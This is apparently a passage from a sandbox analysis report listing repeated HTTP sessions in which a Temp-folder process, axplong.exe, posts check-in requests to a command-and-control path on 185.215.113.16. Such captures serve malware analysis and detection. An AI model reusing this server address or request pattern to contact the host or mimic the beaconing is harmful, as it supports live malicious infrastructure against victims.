                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:35.085647106 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:35.311625957 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    31 | 192.168.2.6 | 56658 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:35.434259892 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:36.134392977 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:36.135288954 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:36.362466097 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    32 | 192.168.2.6 | 56659 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:36.481770039 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:37.171601057 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:37.172561884 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:37.395509005 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    33 | 192.168.2.6 | 56660 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:37.511740923 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:38.221683979 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:38.222667933 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:38.452107906 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    34 | 192.168.2.6 | 56661 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:38.572932959 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:39.263139009 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:39.263951063 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:39.486418009 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    35 | 192.168.2.6 | 56662 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:39.604418993 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:40.303152084 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:40.304280043 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:40.732359886 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    36 | 192.168.2.6 | 56663 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:40.855696917 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:41.570380926 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:41.571145058 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:41.803040028 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    37 | 192.168.2.6 | 56664 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:41.919622898 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:42.649111986 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:42.650000095 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:42.886360884 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    38 | 192.168.2.6 | 56665 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:42.995091915 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:43.693146944 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:43.694160938 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:43.918688059 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    39 | 192.168.2.6 | 56666 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:44.028135061 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:44.734633923 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:44.735745907 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:44.968997955 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    40 | 192.168.2.6 | 56667 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:45.091398001 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:45.783442020 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:45.784451008 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:46.007337093 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    41 | 192.168.2.6 | 56668 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:46.119908094 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:46.813469887 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:46.814649105 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:47.043282032 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    42 | 192.168.2.6 | 56669 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:47.152138948 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:47.854932070 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:47.856631994 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:48.087030888 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    43 | 192.168.2.6 | 56670 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:48.416569948 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:49.115117073 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:49.115890026 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:49.344259977 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    44 | 192.168.2.6 | 56671 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:49.463923931 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:50.211724043 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:50.212703943 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:50.483169079 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    45 | 192.168.2.6 | 56672 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:50.616368055 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:51.315181971 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:51.316215992 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:51.544382095 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:51 GMT
                    Content-Type: text/html; charset=UTF-8
